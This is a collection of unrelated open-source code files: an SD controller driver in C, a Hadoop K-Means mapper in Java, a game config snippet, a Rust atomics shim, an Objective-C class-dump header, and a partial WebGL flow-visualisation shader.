		XSdps_Smc(InstancePtr, SD1_DLL_CTRL, SD_DLL_RST, (EnRst == 1U) ? SD_DLL_RST : 0U);
#else
		/* Read-modify-write the DLL reset bit for SD1 */
		DllCtrl = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD1_DLL_CTRL);
		if (EnRst == 1U) {
			DllCtrl |= SD_DLL_RST;
		} else {
			DllCtrl &= ~SD_DLL_RST;
		}
		XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD1_DLL_CTRL, DllCtrl);
#endif
#ifdef XPAR_PSV_PMC_SD_0_DEVICE_ID
	}
#endif /* XPAR_PSV_PMC_SD_0_DEVICE_ID */
#else /* versal */
#ifdef XPAR_PSU_SD_0_DEVICE_ID
	if (DeviceId == 0U) {
#if EL1_NONSECURE && defined (__aarch64__)
		(void)DllCtrl;

		/* Delegate the SD0 DLL reset write to firmware */
		XSdps_Smc(InstancePtr, SD_DLL_CTRL, SD0_DLL_RST, (EnRst == 1U) ? SD0_DLL_RST : 0U);
#else
		/* Read-modify-write the SD0 DLL reset bit (shared register) */
		DllCtrl = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_DLL_CTRL);
		if (EnRst == 1U) {
			DllCtrl |= SD0_DLL_RST;
		} else {
			DllCtrl &= ~SD0_DLL_RST;
		}
		XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_DLL_CTRL, DllCtrl);
#endif
	} else {
#endif /* XPAR_PSU_SD_0_DEVICE_ID */
		(void) DeviceId;
#if EL1_NONSECURE && defined (__aarch64__)
		(void)DllCtrl;

		/* Delegate the SD1 DLL reset write to firmware */
		XSdps_Smc(InstancePtr, SD_DLL_CTRL, SD1_DLL_RST, (EnRst == 1U) ? SD1_DLL_RST : 0U);
#else
		/* Read-modify-write the SD1 DLL reset bit (shared register) */
		DllCtrl = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_DLL_CTRL);
		if (EnRst == 1U) {
			DllCtrl |= SD1_DLL_RST;
		} else {
			DllCtrl &= ~SD1_DLL_RST;
		}
		XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_DLL_CTRL, DllCtrl);
#endif
#ifdef XPAR_PSU_SD_0_DEVICE_ID
	}
#endif
#endif
}
/*****************************************************************************/
/**
 *
 * @brief
 * Function to configure the Tap Delays.
 *
 *
 * @param	InstancePtr is a pointer to the XSdPs instance.
 *
 * @return	None
 *
 * @note	Applies the input (ITapDelay) and output (OTapDelay) tap
 *		delays selected by the driver. On Versal the taps live in
 *		controller-local registers; on non-Versal they live in
 *		system-level (SLCR) registers shared between SD0 and SD1,
 *		with the SD1 fields shifted up by 16 bits. At EL1 non-secure
 *		on aarch64 the writes go through SMC calls. The ITAPCHGWIN
 *		bit opens a change window that must bracket ITAPDLY updates.
 *
 ******************************************************************************/
void XSdPs_ConfigTapDelay(XSdPs *InstancePtr)
{
	u32 DeviceId;
	u32 TapDelay;
	u32 ITapDelay;
	u32 OTapDelay;

	DeviceId = InstancePtr->Config.DeviceId ;
	TapDelay = 0U;
	ITapDelay = InstancePtr->ITapDelay;
	OTapDelay = InstancePtr->OTapDelay;
#ifdef versal
	(void) DeviceId;
	if (ITapDelay) {
		/* Open the change window before touching ITAPDLY */
		TapDelay = SD_ITAPCHGWIN;
		XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_ITAPDLY, TapDelay);
		/* Program the ITAPDLY */
		TapDelay |= SD_ITAPDLYENA;
		XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_ITAPDLY, TapDelay);
		TapDelay |= ITapDelay;
		XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_ITAPDLY, TapDelay);
		/* Close the change window to latch the new input tap */
		TapDelay &= ~SD_ITAPCHGWIN;
		XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_ITAPDLY, TapDelay);
	}
	if (OTapDelay) {
		/* Program the OTAPDLY */
		TapDelay = SD_OTAPDLYENA;
		XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_OTAPDLY, TapDelay);
		TapDelay |= OTapDelay;
		XSdPs_WriteReg(InstancePtr->Config.BaseAddress, SD_OTAPDLY, TapDelay);
	}
#else
#ifdef XPAR_PSU_SD_0_DEVICE_ID
	if (DeviceId == 0U) {
#if EL1_NONSECURE && defined (__aarch64__)
		(void)TapDelay;
		/* Non-secure EL1: delegate the SD0 tap writes to firmware */
		if (ITapDelay) {
			XSdps_Smc(InstancePtr, SD_ITAPDLY, SD0_ITAPCHGWIN, SD0_ITAPCHGWIN);
			XSdps_Smc(InstancePtr, SD_ITAPDLY, SD0_ITAPDLYENA, SD0_ITAPDLYENA);
			XSdps_Smc(InstancePtr, SD_ITAPDLY, SD0_ITAPDLY_SEL_MASK, ITapDelay);
			XSdps_Smc(InstancePtr, SD_ITAPDLY, SD0_ITAPCHGWIN, 0U);
		}
		if (OTapDelay) {
			XSdps_Smc(InstancePtr, SD_OTAPDLY, SD0_OTAPDLY_SEL_MASK, OTapDelay);
		}
#else
		if (ITapDelay) {
			/* Open the change window before touching ITAPDLY */
			TapDelay = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY);
			TapDelay |= SD0_ITAPCHGWIN;
			XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
			/* Program the ITAPDLY */
			TapDelay |= SD0_ITAPDLYENA;
			XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
			TapDelay |= ITapDelay;
			XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
			/* Close the change window to latch the new input tap */
			TapDelay &= ~SD0_ITAPCHGWIN;
			XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
		}
		if (OTapDelay) {
			/* Program the OTAPDLY */
			TapDelay = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_OTAPDLY);
			TapDelay &= ~SD0_OTAPDLY_SEL_MASK;
			TapDelay |= OTapDelay;
			XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_OTAPDLY, TapDelay);
		}
#endif
	} else {
#endif
		(void) DeviceId;
		/* SD1 tap-delay fields sit 16 bits above the SD0 fields */
		ITapDelay = ITapDelay << 16U;
		OTapDelay = OTapDelay << 16U;
#if EL1_NONSECURE && defined (__aarch64__)
		(void)TapDelay;
		/* Non-secure EL1: delegate the SD1 tap writes to firmware */
		if (ITapDelay) {
			XSdps_Smc(InstancePtr, SD_ITAPDLY, SD1_ITAPCHGWIN, SD1_ITAPCHGWIN);
			XSdps_Smc(InstancePtr, SD_ITAPDLY, SD1_ITAPDLYENA, SD1_ITAPDLYENA);
			XSdps_Smc(InstancePtr, SD_ITAPDLY, SD1_ITAPDLY_SEL_MASK, ITapDelay);
			XSdps_Smc(InstancePtr, SD_ITAPDLY, SD1_ITAPCHGWIN, 0U);
		}
		if (OTapDelay) {
			XSdps_Smc(InstancePtr, SD_OTAPDLY, SD1_OTAPDLY_SEL_MASK, OTapDelay);
		}
#else
		if (ITapDelay) {
			/* Open the change window before touching ITAPDLY */
			TapDelay = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY);
			TapDelay |= SD1_ITAPCHGWIN;
			XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
			/* Program the ITAPDLY */
			TapDelay |= SD1_ITAPDLYENA;
			XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
			TapDelay |= ITapDelay;
			XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
			/* Close the change window to latch the new input tap */
			TapDelay &= ~SD1_ITAPCHGWIN;
			XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_ITAPDLY, TapDelay);
		}
		if (OTapDelay) {
			/* Program the OTAPDLY */
			TapDelay = XSdPs_ReadReg(InstancePtr->SlcrBaseAddr, SD_OTAPDLY);
			TapDelay &= ~SD1_OTAPDLY_SEL_MASK;
			TapDelay |= OTapDelay;
			XSdPs_WriteReg(InstancePtr->SlcrBaseAddr, SD_OTAPDLY, TapDelay);
		}
#endif
#ifdef XPAR_PSU_SD_0_DEVICE_ID
	}
#endif
#endif /* versal */
}
/*****************************************************************************/
/**
 * @brief
 * This function is used to switch signaling voltage to 1.8V.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return
 * 		- XST_SUCCESS if successful
 * 		- XST_FAILURE if failure
 *
 ******************************************************************************/
s32 XSdPs_SetVoltage18(XSdPs *InstancePtr)
{
	u16 Ctrl2;

	/* Request 1.8V signaling via Host Control 2 (read-modify-write) */
	Ctrl2 = XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
				XSDPS_HOST_CTRL2_OFFSET);
	Ctrl2 |= XSDPS_HC2_1V8_EN_MASK;
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			 XSDPS_HOST_CTRL2_OFFSET, Ctrl2);

	/* Wait minimum 5mSec for the switch to settle */
	(void)usleep(5000U);

	/* Confirm the controller accepted the 1.8V switch */
	if (XSdPs_CheckVoltage18(InstancePtr) != XST_SUCCESS) {
		return XST_FAILURE;
	}

	return XST_SUCCESS;
}
/*****************************************************************************/
/**
 * @brief
 * This function is used configure the Power Level.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return	None
 *
 ******************************************************************************/
void XSdPs_ConfigPower(XSdPs *InstancePtr)
{
	u8 Voltage;

	/* Pick the highest voltage advertised in the host capabilities */
	if ((InstancePtr->Host_Caps & XSDPS_CAP_VOLT_3V3_MASK) != 0U) {
		Voltage = XSDPS_PC_BUS_VSEL_3V3_MASK;
	} else if ((InstancePtr->Host_Caps & XSDPS_CAP_VOLT_3V0_MASK) != 0U) {
		Voltage = XSDPS_PC_BUS_VSEL_3V0_MASK;
	} else if ((InstancePtr->Host_Caps & XSDPS_CAP_VOLT_1V8_MASK) != 0U) {
		Voltage = XSDPS_PC_BUS_VSEL_1V8_MASK;
	} else {
		Voltage = 0U;
	}

	/* Apply the selection and switch bus power on */
	XSdPs_WriteReg8(InstancePtr->Config.BaseAddress,
			XSDPS_POWER_CTRL_OFFSET,
			Voltage | XSDPS_PC_BUS_PWR_MASK);
}
/*****************************************************************************/
/**
 * @brief
 * This function is used configure the DMA mode.
 *
 * @param	InstancePtr is a pointer to the instance to be worked on.
 *
 * @return	None
 *
 ******************************************************************************/
void XSdPs_ConfigDma(XSdPs *InstancePtr)
{
	u8 DmaMode;

	/* 3.0 hosts run ADMA2 with 64-bit descriptors, older ones 32-bit */
	DmaMode = (InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) ?
		  XSDPS_HC_DMA_ADMA2_64_MASK : XSDPS_HC_DMA_ADMA2_32_MASK;

	XSdPs_WriteReg8(InstancePtr->Config.BaseAddress,
			XSDPS_HOST_CTRL1_OFFSET, DmaMode);
}
/*****************************************************************************/
/**
* @brief
* This function is used to configure the interrupt enables.
*
* Status reporting is enabled for all error interrupts and for all normal
* interrupts except the card interrupt, while the interrupt *signal*
* enables (which would raise a CPU interrupt) are left disabled, so the
* driver can poll the status registers.
*
* @param	InstancePtr is a pointer to the instance to be worked on.
*
* @return	None
*
******************************************************************************/
void XSdPs_ConfigInterrupt(XSdPs *InstancePtr)
{
	/* Enable all interrupt status except card interrupt initially */
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			XSDPS_NORM_INTR_STS_EN_OFFSET,
			XSDPS_NORM_INTR_ALL_MASK & (~XSDPS_INTR_CARD_MASK));
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			XSDPS_ERR_INTR_STS_EN_OFFSET,
			XSDPS_ERROR_INTR_ALL_MASK);

	/* Disable all interrupt signals by default. */
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			XSDPS_NORM_INTR_SIG_EN_OFFSET, 0x0U);
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			XSDPS_ERR_INTR_SIG_EN_OFFSET, 0x0U);
}
/*****************************************************************************/
/**
* This function does SD command generation.
*
* @param	InstancePtr is a pointer to the instance to be worked on.
* @param	Cmd is the command to be sent.
* @param	Arg is the argument to be sent along with the command.
*		This could be address or any other information
* @param	BlkCnt - Block count passed by the user.
*
* @return
*		- XST_SUCCESS if initialization was successful
*		- XST_FAILURE if failure - could be because another transfer
*		is in progress, command or data inhibit is set, or the
*		command never completed within the polling budget
*
******************************************************************************/
s32 XSdPs_CmdTransfer(XSdPs *InstancePtr, u32 Cmd, u32 Arg, u32 BlkCnt)
{
	u32 Timeout = 10000000U;
	u32 StatusReg;
	s32 Status;

	Status = XSdPs_SetupCmd(InstancePtr, Arg, BlkCnt);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	Status = XSdPs_SendCmd(InstancePtr, Cmd);
	if (Status != XST_SUCCESS) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Polling for response for now */
	do {
		StatusReg = XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
				XSDPS_NORM_INTR_STS_OFFSET);
		if ((Cmd == CMD21) || (Cmd == CMD19)) {
			/* Tuning commands complete on Buffer Read Ready
			 * rather than Command Complete. */
			if ((XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
					XSDPS_NORM_INTR_STS_OFFSET) & XSDPS_INTR_BRR_MASK) != 0U) {
				XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
						XSDPS_NORM_INTR_STS_OFFSET, XSDPS_INTR_BRR_MASK);
				break;
			}
		}

		if ((StatusReg & XSDPS_INTR_ERR_MASK) != 0U) {
			Status = (s32)XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
					XSDPS_ERR_INTR_STS_OFFSET);
			if (((u32)Status & ~XSDPS_INTR_ERR_CT_MASK) == 0U) {
				Status = XSDPS_CT_ERROR;
			}
			/* Write to clear error bits */
			XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
					XSDPS_ERR_INTR_STS_OFFSET,
					XSDPS_ERROR_INTR_ALL_MASK);
			goto RETURN_PATH;
		}
		Timeout = Timeout - 1U;
	} while (((StatusReg & XSDPS_INTR_CC_MASK) == 0U)
			&& (Timeout != 0U));

	/* Fail if the poll budget was exhausted before command completion.
	 * (The original code never checked Timeout here and reported success
	 * on a hung command.) Tuning commands that broke out on BRR are
	 * exempt: the break happens before the decrement, so Timeout is
	 * always non-zero on that path. */
	if ((Timeout == 0U) && ((StatusReg & XSDPS_INTR_CC_MASK) == 0U)) {
		Status = XST_FAILURE;
		goto RETURN_PATH;
	}

	/* Write to clear bit */
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			XSDPS_NORM_INTR_STS_OFFSET,
			XSDPS_INTR_CC_MASK);

	Status = XST_SUCCESS;

RETURN_PATH:
	return Status;
}
/*****************************************************************************/
/**
* This function is used to check if the transfer is completed successfully.
*
* It polls the normal interrupt status register (sleeping 1us between
* reads) until Transfer Complete, an error interrupt, or the poll budget
* is exhausted.
*
* @param	InstancePtr is a pointer to the instance to be worked on.
*
* @return
*		- XST_SUCCESS if the transfer completed
*		- XST_FAILURE on an error interrupt or poll timeout
*
******************************************************************************/
s32 XSdps_CheckTransferDone(XSdPs *InstancePtr)
{
	u32 Timeout = 5000000U;
	u16 StatusReg;
	s32 Status;

	/*
	 * Check for transfer complete
	 * Polling for response for now
	 */
	do {
		StatusReg = XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
				XSDPS_NORM_INTR_STS_OFFSET);
		if ((StatusReg & XSDPS_INTR_ERR_MASK) != 0U) {
			/* Write to clear error bits */
			XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
					XSDPS_ERR_INTR_STS_OFFSET,
					XSDPS_ERROR_INTR_ALL_MASK);
			Status = XST_FAILURE;
			goto RETURN_PATH;
		}
		Timeout = Timeout - 1U;
		usleep(1);
	} while (((StatusReg & XSDPS_INTR_TC_MASK) == 0U)
			&& (Timeout != 0U));

	if (Timeout == 0U) {
		Status = XST_FAILURE;
		goto RETURN_PATH ;
	}

	/* Write to clear bit */
	XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
			XSDPS_NORM_INTR_STS_OFFSET, XSDPS_INTR_TC_MASK);

	Status = XST_SUCCESS;

RETURN_PATH:
	return Status;
}
/*****************************************************************************/
/**
* @brief
* This function is used to check if the CMD/DATA bus is idle or not.
*
* @param	InstancePtr is a pointer to the instance to be worked on.
* @param	Value is the present-state mask to select the CMD bus or
*		DAT bus line(s) to wait on.
*
* @return
*		- XST_SUCCESS if the selected bus line(s) went idle (or no
*		card is inserted, in which case the wait is skipped)
*		- XST_FAILURE if the poll budget expired first
*
******************************************************************************/
s32 XSdPs_CheckBusIdle(XSdPs *InstancePtr, u32 Value)
{
	u32 Timeout = 10000000U;
	u32 PresentStateReg;
	u32 StatusReg;
	s32 Status;

	PresentStateReg = XSdPs_ReadReg(InstancePtr->Config.BaseAddress,
			XSDPS_PRES_STATE_OFFSET);

	/* Check for Card Present; with no card there is nothing to wait on
	 * and Timeout stays non-zero, so the function reports success. */
	if ((PresentStateReg & XSDPS_PSR_CARD_INSRT_MASK) != 0U) {
		/* Check for SD idle: poll until the selected line bits clear */
		do {
			StatusReg = XSdPs_ReadReg(InstancePtr->Config.BaseAddress,
					XSDPS_PRES_STATE_OFFSET);
			Timeout = Timeout - 1;
			usleep(1);
		} while (((StatusReg & Value) != 0U)
				&& (Timeout != 0U));
	}

	if (Timeout == 0U) {
		Status = XST_FAILURE;
		goto RETURN_PATH ;
	}

	Status = XST_SUCCESS;

RETURN_PATH:
	return Status;
}
/*****************************************************************************/
/**
* @brief
* This function frames the Command register for a particular command.
* Note that this generates only the command register value i.e.
* the upper 16 bits of the transfer mode and command register.
* This value is already shifted to be upper 16 bits and can be directly
* OR'ed with transfer mode register value.
*
* @param	InstancePtr is a pointer to the instance to be worked on.
* @param	Cmd is the Command to be sent.
*
* @return	Command register value complete with response type and
*		data, CRC and index related flags.
*
******************************************************************************/
u32 XSdPs_FrameCmd(XSdPs *InstancePtr, u32 Cmd)
{
	u32 RetVal;

	RetVal = Cmd;

	/* OR in the response type for each command index; data-transfer
	 * commands additionally set the data-present select flag. Several
	 * commands differ between SD cards and MMC/eMMC, hence the
	 * CardType checks. */
	switch(Cmd) {
	case CMD0:
		RetVal |= RESP_NONE;
		break;
	case CMD1:
		RetVal |= RESP_R3;
		break;
	case CMD2:
		RetVal |= RESP_R2;
		break;
	case CMD3:
		if (InstancePtr->CardType == XSDPS_CARD_SD) {
			RetVal |= RESP_R6;
		} else {
			RetVal |= RESP_R1;
		}
		break;
	case CMD4:
		RetVal |= RESP_NONE;
		break;
	case CMD5:
		RetVal |= RESP_R1B;
		break;
	case CMD6:
		if (InstancePtr->CardType == XSDPS_CARD_SD) {
			RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
		} else {
			RetVal |= RESP_R1B;
		}
		break;
	case ACMD6:
		RetVal |= RESP_R1;
		break;
	case CMD7:
		RetVal |= RESP_R1;
		break;
	case CMD8:
		if (InstancePtr->CardType == XSDPS_CARD_SD) {
			RetVal |= RESP_R1;
		} else {
			/* On MMC, CMD8 (SEND_EXT_CSD) transfers data. */
			RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
		}
		break;
	case CMD9:
		RetVal |= RESP_R2;
		break;
	case CMD11:
	case CMD10:
	case CMD12:
		RetVal |= RESP_R1;
		break;
	case ACMD13:
		RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
		break;
	case CMD16:
		RetVal |= RESP_R1;
		break;
	case CMD17:
	case CMD18:
	case CMD19:
	case CMD21:
		RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
		break;
	case CMD23:
	case ACMD23:
	case CMD24:
	case CMD25:
		RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
		break;
	case ACMD41:
		RetVal |= RESP_R3;
		break;
	case ACMD42:
		RetVal |= RESP_R1;
		break;
	case ACMD51:
		RetVal |= RESP_R1 | (u32)XSDPS_DAT_PRESENT_SEL_MASK;
		break;
	case CMD52:
	case CMD55:
		RetVal |= RESP_R1;
		break;
	case CMD58:
		break;
	default :
		/* Unknown command: the OR with Cmd is a no-op since RetVal
		 * already equals Cmd; no response flags are added. */
		RetVal |= Cmd;
		break;
	}

	return RetVal;
}
/** @} */
| {
"pile_set_name": "Github"
} |
/* file: KmeansDenseInitStep1Mapper.java */
/*******************************************************************************
* Copyright 2017-2020 Intel Corporation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*******************************************************************************/
package DAAL;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.BufferedWriter;
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.InputStreamReader;
import java.util.Arrays;
import org.apache.hadoop.fs.*;
import org.apache.hadoop.io.*;
import org.apache.hadoop.mapreduce.Mapper;
import org.apache.hadoop.mapreduce.Mapper.Context;
import org.apache.hadoop.conf.Configuration;
import com.intel.daal.data_management.data.HomogenNumericTable;
import com.intel.daal.algorithms.kmeans.init.*;
import com.intel.daal.algorithms.kmeans.*;
import com.intel.daal.data_management.data.*;
import com.intel.daal.services.*;
/**
 * Hadoop mapper implementing step 1 (local) of distributed K-Means
 * initialization with Intel DAAL. Each map task reads one block of the
 * input data set from HDFS, runs the local initialization step, and
 * emits the partial result keyed to a single reducer, tagged with the
 * block's sequence number.
 */
public class KmeansDenseInitStep1Mapper extends Mapper<Object, Text, IntWritable, WriteableData> {

    private static final int nBlocks = 4;
    private static final int nFeatures = 20;
    private static final int nVectorsInBlock = 10000;
    private static final long nClusters = 20;

    /* Index is supposed to be a sequence number for the split */
    private int index = 0;
    private int totalTasks = 0;

    @Override
    public void setup(Context context) {
        // Seed the sequence number from the task id; successive map() calls
        // stride by the total task count so indices stay unique.
        index = context.getTaskAttemptID().getTaskID().getId();
        Configuration conf = context.getConfiguration();
        totalTasks = conf.getInt("mapred.map.tasks", 0);
    }

    @Override
    public void map(Object key, Text value,
                    Context context) throws IOException, InterruptedException {

        DaalContext daalContext = new DaalContext();

        /* Read a data set */
        String filePath = "/Hadoop/KmeansDense/data/" + value;
        double[] data = new double[nFeatures * nVectorsInBlock];
        readData(filePath, nFeatures, nVectorsInBlock, data);
        HomogenNumericTable ntData = new HomogenNumericTable(daalContext, data, nFeatures, nVectorsInBlock);

        /* Create an algorithm to initialize the K-Means algorithm on local nodes */
        InitDistributedStep1Local kmeansLocalInit = new InitDistributedStep1Local(daalContext, Double.class, InitMethod.randomDense,
                nClusters, nVectorsInBlock * nBlocks, nVectorsInBlock * index);
        kmeansLocalInit.input.set( InitInputId.data, ntData );

        /* Initialize the K-Means algorithm on local nodes */
        InitPartialResult pres = kmeansLocalInit.compute();

        /* Write the data prepended with a data set sequence number. Needed to know the position of the data set in the input data */
        context.write(new IntWritable(0), new WriteableData(index, pres));

        daalContext.dispose();
        index += totalTasks;
    }

    /**
     * Reads up to {@code nVectors} comma-separated rows of {@code nFeatures}
     * doubles from {@code dataset} on HDFS into {@code data} (row-major).
     * Errors are logged and leave {@code data} partially filled (remaining
     * entries stay 0.0), matching the original best-effort behavior.
     */
    private static void readData(String dataset, int nFeatures, int nVectors, double[] data) {
        System.out.println("readData " + dataset);
        Path pt = new Path(dataset);
        try {
            FileSystem fs = FileSystem.get(new Configuration());
            /* try-with-resources guarantees the reader is closed even when a
             * read or parse error aborts the loop (the original leaked it on
             * the exception paths). */
            try (BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(fs.open(pt)))) {
                int nLine = 0;
                for (String line; ((line = bufferedReader.readLine()) != null) && (nLine < nVectors); nLine++) {
                    String[] elements = line.split(",");
                    for (int j = 0; j < nFeatures; j++) {
                        data[nLine * nFeatures + j] = Double.parseDouble(elements[j]);
                    }
                }
            }
        }
        catch (IOException e) {
            e.printStackTrace();
        }
        catch (NumberFormatException e) {
            e.printStackTrace();
        }
    }
}
| {
"pile_set_name": "Github"
} |
"relic_void_spirit_triple_hero_pulse"
{
"template" "void_spirit_triple_hero_pulse"
"no_plus" "1"
"<hero_hit_count>"
{
"1" "1"
}
}
| {
"pile_set_name": "Github"
} |
// Non-loom build: re-export the real `core` atomics and provide a small
// `AtomicMut` helper for non-atomic access to an `AtomicPtr`'s inner raw
// pointer when exclusive access is already guaranteed.
#[cfg(not(all(test, loom)))]
pub(crate) mod sync {
    pub(crate) mod atomic {
        pub(crate) use core::sync::atomic::{fence, AtomicPtr, AtomicUsize, Ordering};

        /// Mutable, non-atomic access to the pointer stored in an atomic cell.
        pub(crate) trait AtomicMut<T> {
            fn with_mut<F, R>(&mut self, f: F) -> R
            where
                F: FnOnce(&mut *mut T) -> R;
        }

        impl<T> AtomicMut<T> for AtomicPtr<T> {
            fn with_mut<F, R>(&mut self, f: F) -> R
            where
                F: FnOnce(&mut *mut T) -> R,
            {
                // `&mut self` guarantees exclusive access, so `get_mut`
                // skips atomic operations entirely.
                f(self.get_mut())
            }
        }
    }
}
// Loom build (concurrency model checking under `cfg(test)`): substitute
// loom's instrumented atomics. `AtomicMut` is reduced to a marker trait
// here — presumably because loom's `AtomicPtr` does not expose the same
// mutable access; confirm against the loom API if extending.
#[cfg(all(test, loom))]
pub(crate) mod sync {
    pub(crate) mod atomic {
        pub(crate) use loom::sync::atomic::{fence, AtomicPtr, AtomicUsize, Ordering};

        pub(crate) trait AtomicMut<T> {}
    }
}
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.
//
#import <Cocoa/NSObject.h>
@class Album, ImportSession2, NSArray;

// Class-dump reconstruction: a queued photo-import operation wrapping an
// ImportSession2. Implementation details are not visible here.
@interface QueuedImportSession : NSObject
{
    ImportSession2 *_session;    // underlying import session
    NSArray *_files;             // files queued for import
    struct IPPhotoList *_photos; // C-level photo list
    Album *_cameraAlbum;
    Album *_photoCDAlbum;
}

- (void)dealloc;
- (id)initWithImportSession:(id)arg1;

@end
| {
"pile_set_name": "Github"
} |
'use strict';
const glsl = require('glslify');

// Builds the regl draw command that renders the flow-visualization mesh.
// Vertices arrive in (r, theta) grid coordinates and are mapped through a
// complex conformal transform in the vertex shader (appears to be a
// Karman-Trefftz-style airfoil mapping — TODO confirm); the fragment
// shader overlays pressure contours, streamlines, and grid lines.
module.exports = function (regl, mesh) {
  return regl({
    // Vertex shader: computes the mapped position z, the stream function
    // (psi), and the pressure coefficient (cp) for the fragment stage.
    vert: `
    precision highp float;
    attribute vec2 rth;
    varying float psi, cp, rgrid;
    varying vec2 uv, xy;
    uniform mat4 modelview;
    uniform vec2 mu, gridSize;
    uniform float r0, theta0, n, circulation, scale, rsize, alpha, colorScale;
    #define OPI2 0.15915494309
    vec2 cdiv (vec2 a, vec2 b) {
    return vec2(a.x * b.x + a.y * b.y, a.y * b.x - a.x * b.y) / dot(b, b);
    }
    vec2 cmul (vec2 a, vec2 b) {
    return vec2(a.x * b.x - a.y * b.y, a.y * b.x + a.x * b.y);
    }
    vec2 csqr (vec2 a) {
    return vec2(a.x * a.x - a.y * a.y, 2.0 * a.x * a.y);
    }
    vec2 cinv (vec2 a) {
    return vec2(a.x, -a.y) / dot(a, a);
    }
    float cmag2 (vec2 a) {
    return dot(a, a);
    }
    void main () {
    uv = rth;
    uv.x = pow(uv.x, 0.6666666);
    uv *= gridSize;
    uv.y *= OPI2;
    rgrid = rth.x;
    float r = 1.0 + rgrid * rsize;
    float theta = rth.y + theta0;
    vec2 rot = vec2(cos(alpha), sin(alpha));
    vec2 zeta = r * vec2(cos(theta), sin(theta));
    xy = (mu + r0 * zeta) - vec2(1, 0);
    // Compute 1 + 1 / zeta and 1 - 1 / zeta:
    vec2 oz = cinv(r0 * zeta + mu);
    vec2 opz = oz;
    vec2 omz = -oz;
    opz.x += 1.0;
    omz.x += 1.0;
    // Exponentiate both of the above:
    float opznarg = atan(opz.y, opz.x) * n;
    float opznmod = pow(dot(opz, opz), n * 0.5);
    // (1 + 1 / (zeta + mu)) ** n:
    vec2 opzn = opznmod * vec2(cos(opznarg), sin(opznarg));
    float omznarg = atan(omz.y, omz.x) * n;
    float omznmod = pow(dot(omz, omz), n * 0.5);
    // (1 - 1 / (zeta + mu)) ** n:
    vec2 omzn = omznmod * vec2(cos(omznarg), sin(omznarg));
    // Compute the potential:
    vec2 circ = vec2(0.0, circulation * OPI2);
    vec2 wt = rot - cdiv(csqr(cinv(zeta)), rot) + cdiv(circ, zeta);
    // Compute the final coordinate, z:
    vec2 z = n * cdiv(opzn + omzn, opzn - omzn);
    //vec2 z = mu + r0 * zeta;
    // Compute the jacobian:
    vec2 dzdzeta = 4.0 * n * n * cdiv(cmul(opzn, omzn), cmul(csqr(r0 * zeta + mu) - vec2(1, 0), csqr(opzn - omzn)));
    //vec2 dzdzeta = vec2(1, 0);
    cp = 1.0 - cmag2(cdiv(wt, dzdzeta)) * colorScale;
    // Compute z^2 - 1
    psi = (r - 1.0 / r) * sin(theta + alpha) + circulation * OPI2 * log(r);
    //z.x -= n;
    //z /= scale;
